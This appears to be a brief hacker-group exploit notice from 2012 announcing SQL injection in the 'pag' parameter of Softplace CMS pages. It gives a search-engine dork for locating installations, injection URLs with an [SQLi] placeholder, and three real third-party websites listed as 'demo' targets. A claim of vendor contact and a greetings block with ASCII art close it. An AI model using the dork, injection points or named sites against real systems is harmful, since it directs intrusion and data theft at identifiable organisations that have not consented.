Softplace CMS Remote SQL Injection Vulnerability Software : Softplace Date : 1/23/2012 Vendor : http://softplace.it ( Commercial ) Dork : intext:"Powered by Softplace" Author : ITTIHACK Home : http://ittihack.com Vulnerable File : index.php | index_int.php Exploit : http://site/path/index.php?pag=[SQLi] http://site/path/index_int.php?pag=[SQLi] Demo Sites : http://www.anlaids.org/web/index.php?pag=8 http://www.lavoro.provincia.vercelli.it/portaleweb/vc_portale/index_int.php?pag=136 http://www.rnre.eu/rnre/index.php?pag=19 Solution : The Vendor was contacted to fix this vulnerability as soon as possible. Keep your software up-to-date #Greatz to: ___ ____ ____ #````______/```\__//```\__/____\ #``_/```\_/``:```````````//____\ #`/|``````:``:``..``````/ Reinie \ #|`|`````::`````::``````\````````/ #|`|`````:|`````||`````\`\______/ #|`|`````||`````||``````|\``/``| #`\|`````||`````||``````|```/`|`\ #``|`````||`````||``````|``/`/_\`\ #``|`___`||`___`||``````|`/``/````\ #```\_-_/``\_-_/`|`____`|/__/``````\ #````````````````_\_--_/````\`````/ #```````````````/____```````````/ #``````````````/`````\`````````/ #``````````````\______\_______/